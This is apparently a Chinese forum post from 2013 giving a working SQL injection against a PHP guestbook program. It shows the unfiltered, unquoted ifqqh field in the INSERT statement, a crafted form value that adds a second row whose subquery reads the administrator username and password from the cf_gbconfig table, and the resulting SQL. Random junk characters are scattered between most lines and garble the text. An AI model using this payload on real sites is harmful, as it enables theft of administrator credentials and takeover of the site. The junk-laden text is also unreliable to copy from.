留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
: [! @6 S3 W4 `# ?' m6 A: [3 {! {
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
1 p1 `+ N2 C+ ~( C- B$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
6 F& A; \1 R1 h6 h/ [
, Y5 z8 U u: k& z2 K提交的时候把ifqqh的值改一下。变成
}- R' s. y) Y2 `, \1 {& ~* h+ Z x, X$ t) s1 E! _4 s
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
" f$ b9 ^. y2 Q) e7 z) C" ^0 L' _
这样SQL插入语句就变了.$ I: ? O9 {$ _ `+ `
) O- d& d/ M* P/ h1 finsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0); _7 _# y/ k F" a& y* R! p0 w+ P
5 e! E" O, C" ^( B' z
构造了另外一句SQL。并且把帐号密码读出来。5 I) n O6 d" V7 g
; x$ C0 s/ W5 U& ^- @: R |
发表于 2013-2-19 08:10:11
收藏
支持
反对